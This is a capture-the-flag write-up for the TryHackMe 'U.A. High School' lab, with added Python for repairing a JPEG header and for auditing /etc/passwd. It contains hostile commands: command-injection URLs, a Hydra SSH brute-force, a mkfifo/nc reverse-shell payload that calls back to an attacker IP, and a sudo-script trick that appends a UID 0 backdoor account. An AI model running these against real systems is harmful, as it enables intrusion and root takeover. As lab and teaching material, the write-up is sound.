Challenges: U.A High School (TryHackMe)


This challenge tasked us with testing the security of a web application developed by U.A., the renowned Superhero Academy. The objective was to identify vulnerabilities, gain an initial foothold, escalate privileges, and ultimately retrieve the required flags. We began with network and directory enumeration using nmap and gobuster. This initial phase revealed a web endpoint that allowed command execution via its cmd parameter. Using this entry point, we gained shell access as the www-data user, discovered hidden files, decoded embedded credentials, and used them to pivot into a user account with SSH access.
Join us in the mission to protect the digital world of superheroes! U.A., the most renowned Superhero Academy, is looking for a superhero to test the security of our new site.
Our site is a reflection of our school values, designed by our engineers with incredible Quirks. We have gone to great lengths to create a secure platform that reflects the exceptional education of the U.A.
Please allow the machine 3 - 5 minutes to fully boot.
Answer the questions below
What is the user.txt flag?
The challenge focused on identifying vulnerabilities in a superhero-themed web application. We began with reconnaissance, using nmap to scan for open ports and gobuster to enumerate directories and files. This revealed an index.php page under /assets whose cmd parameter is vulnerable to command injection (the third gobuster run, with -x php,html,txt, is the one that surfaces the PHP file).

nmap -sV IP_Address
gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://IP_Address/assets -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
Testing this parameter allowed us to execute commands on the host, including reading /etc/passwd, which revealed a user named deku. We attempted to brute-force deku's SSH password with Hydra, without success. Instead, we used the command injection to establish a reverse shell back to our machine using nc and curl.
http://IP_Address/assets/index.php?cmd=ls
http://IP_Address/assets/index.php?cmd=cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
deku:x:1000:1000:deku:/home/deku:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
ubuntu:x:1001:1002:Ubuntu:/home/ubuntu:/bin/bash
/etc/passwd lists a regular user called deku (UID 1000, login shell /bin/bash). We tried Hydra against SSH to find this user's password, but it didn't work:

hydra -l deku -P /usr/share/wordlists/rockyou.txt ssh://IP_Address

Run these two commands in separate tabs (10.10.250.155 is the address of the attacking machine, where the nc listener runs):
nc -lvnp 443
curl -s 'http://IP_Address/assets/index.php' -G --data-urlencode 'cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.250.155 443 >/tmp/f'
Once inside as the www-data user, we discovered a hidden folder named Hidden_Content, which contained a Base64-encoded passphrase.txt file and an image (oneforall.jpg) with a corrupted header. After repairing the header with hexedit, we extracted the hidden data with steghide, which revealed credentials for the deku account. Using these credentials, we logged in via SSH and located the user.txt flag.

After running the curl command, check the tab running nc -lvnp 443: we now have a shell as www-data.

We found the Hidden_Content folder, which held a passphrase.txt file. We checked its content and decoded the Base64 string (it is an encoded passphrase, not a hash); the result is the steghide passphrase used below.

There was also a JPG image whose header had been damaged. We worked on a copy and wrote the standard JFIF signature over the first ten bytes with hexedit:
cp oneforall.jpg fixed.jpg
hexedit fixed.jpg
FF D8 FF E0 00 10 4A 46 49 46
steghide extract -sf fixed.jpg
steghide prompts for a passphrase; enter the decoded value: AllmightForEver!!!

The extracted file holds deku's credentials:

cat creds.txt

With those credentials we log in as deku over SSH and locate the user flag:
ssh deku@IP_Address
find / -type f -name user.txt 2>/dev/null
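The hexedit step above overwrites the first ten bytes by hand. As an added example, not from the original writeup, here is the same repair in Python with the sanity check a practitioner wants before trusting the result: the bytes following the identifier must look like a JFIF APP0 body, otherwise the file may be an Exif JPEG (FF D8 FF E1 ...) and forcing JFIF bytes onto it would hide the problem rather than fix it. The sample bytes are constructed, not the challenge image, and the function names are my own.

```python
"""Detect and repair a damaged JFIF header (added example)."""
import sys

# Bytes 0-9 of a JFIF file: SOI (FF D8), APP0 marker (FF E0), APP0 length
# (00 10 = 16) and the identifier "JFIF". This is exactly the sequence the
# hexedit step above writes.
JFIF_HEADER = bytes.fromhex("FFD8FFE000104A464946")
SOI = b"\xff\xd8"
EOI = b"\xff\xd9"


def header_status(data: bytes) -> str:
    """Classify the start of the file, roughly as `file` would report it."""
    if data.startswith(JFIF_HEADER):
        return "ok"
    if data.startswith(SOI):
        return "soi-ok-app0-damaged"
    return "damaged"


def app0_payload_plausible(data: bytes) -> bool:
    """After the 10 identifier bytes a real JFIF APP0 carries a NUL terminator
    and the major version byte 01. If those are absent the file is probably
    not JFIF at all (an Exif JPEG starts FF D8 FF E1 .. 'Exif'), so the
    ten-byte overwrite is the wrong repair."""
    return data[10:12] == b"\x00\x01"


def repair_jfif_header(data: bytes) -> bytes:
    """Overwrite the first 10 bytes with the canonical JFIF header and leave
    every other byte untouched, so data steghide embedded later in the file
    survives."""
    if len(data) < 12 or not app0_payload_plausible(data):
        raise ValueError("remaining bytes do not look like a JFIF APP0 segment")
    return JFIF_HEADER + data[len(JFIF_HEADER):]


def repair_file(src: str, dst: str) -> str:
    """Like `cp oneforall.jpg fixed.jpg` followed by the hexedit; returns the
    status of the written file."""
    with open(src, "rb") as f:
        data = f.read()
    fixed = repair_jfif_header(data)
    with open(dst, "wb") as f:
        f.write(fixed)
    return header_status(fixed)


# Constructed sample (not the challenge image): a minimal JFIF whose first
# ten bytes were zeroed, followed by the rest of the APP0 body and EOI.
CORRUPTED_SAMPLE = (
    b"\x00" * 10                                   # damaged header
    + b"\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"  # NUL, v1.01, units, density, no thumbnail
    + EOI
)

if __name__ == "__main__":
    if len(sys.argv) == 3:
        print(repair_file(sys.argv[1], sys.argv[2]))
    else:
        print(header_status(CORRUPTED_SAMPLE), "->",
              header_status(repair_jfif_header(CORRUPTED_SAMPLE)))
```

Run it as `python3 fixjpg.py oneforall.jpg fixed.jpg` and then `steghide extract -sf fixed.jpg` as above; if it raises ValueError, inspect the bytes after offset 10 before deciding which signature the file really needs.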
What is the root.txt flag?
For privilege escalation, we examined the sudo -l output and identified a script (/opt/NewComponent/feedback.sh) that deku may run with elevated privileges. Although we could not modify /etc/passwd directly, the script let us append a custom root-level user to it. By adding our own entry with UID 0, we escalated to root, located the root.txt flag, and completed the challenge.

We first read the script, ran it once with a harmless value, and inspected the file it produced:

sudo -l
pwd
cat /opt/NewComponent/feedback.sh
sudo /opt/NewComponent/feedback.sh
cat /tmp/test.txt
ls -la /tmp/test.txt
Next we generated a password hash for the account we planned to add:

mkpasswd -m md5crypt -s

We first tried to append the entry by hand with nano /etc/passwd:

jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash

but as deku we only have read access to /etc/passwd, so the edit could not be saved (it needs root). Instead we ran the script again via sudo and supplied the prepared entry as its input:

sudo /opt/NewComponent/feedback.sh

Then we confirmed that the line had been appended:

tail -n1 /etc/passwd
nano /etc/passwd

jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash is now the last line of /etc/passwd. Because the password field holds a hash rather than x, login does not consult /etc/shadow for this account, and because the UID is 0 the new user is root:

su - jxf
find / -type f -name root.txt 2>/dev/null
cat /root/root.txt
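From the defender's side, the backdoor above leaves an obvious trace: a second UID 0 account, and a password hash sitting in /etc/passwd instead of /etc/shadow. As an added example (not from the original writeup), this Python audit flags both, plus the md5crypt ($1$) format that mkpasswd -m md5crypt produces. The sample passwd content is constructed from entries shown on this page, and the function names are my own.

```python
"""Audit /etc/passwd for backdoor entries like the jxf line above (added example)."""
import sys
from typing import Dict, List

# Values that mean "look in /etc/shadow" or "locked"; anything else in field 2
# is a live hash that su/login will honour without consulting /etc/shadow.
SHADOWED = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split passwd lines into their seven fields; keep malformed lines so the
    audit can report them instead of silently skipping a tampered entry."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": str(lineno), "malformed": line})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"line": str(lineno), "name": name, "pw": pw, "uid": uid,
                        "gid": gid, "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return one finding per suspicious property, in file order."""
    findings = []
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append(f"line {e['line']}: malformed entry {e['malformed']!r}")
            continue
        if not e["uid"].isdigit():
            findings.append(f"line {e['line']}: non-numeric UID for {e['name']!r}")
            continue
        if int(e["uid"]) == 0 and e["name"] != "root":
            findings.append(f"line {e['line']}: extra UID 0 account {e['name']!r}")
        if e["pw"] == "":
            findings.append(f"line {e['line']}: empty password for {e['name']!r}")
        elif e["pw"] not in SHADOWED:
            findings.append(f"line {e['line']}: password hash stored in /etc/passwd "
                            f"for {e['name']!r} (bypasses /etc/shadow)")
            if e["pw"].startswith("$1$"):
                findings.append(f"line {e['line']}: md5crypt hash for {e['name']!r} "
                                f"(weak, fast to crack)")
    return findings


def audit_file(path: str = "/etc/passwd") -> List[str]:
    """Audit a passwd file on disk (the real one by default)."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return audit_passwd(f.read())


# Constructed sample: a subset of the /etc/passwd shown above plus the jxf entry.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
deku:x:1000:1000:deku:/home/deku:/bin/bash
jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash
"""

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for finding in (audit_file(target) if target else audit_passwd(SAMPLE_PASSWD)):
        print(finding)
```

The check only covers the artefact the attacker leaves behind; the root cause on this box is a sudo-enabled script that writes attacker-supplied text to a location the attacker chooses, so the fix is to drop the sudo rule or have the script write only to a fixed, root-owned log path.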
By chaining web exploitation, reverse shell access, credential discovery, and privilege escalation through a vulnerable sudo script, we retrieved both the user.txt and root.txt flags. The exercise showed how several small weaknesses (arbitrary command execution via a GET parameter, a privileged script that can write to /etc/passwd, and credentials left in recoverable files) can be exploited in sequence to fully compromise a system, and it reinforced the importance of secure coding, proper file access controls, and careful credential handling in real-world systems.
Written by Jebitok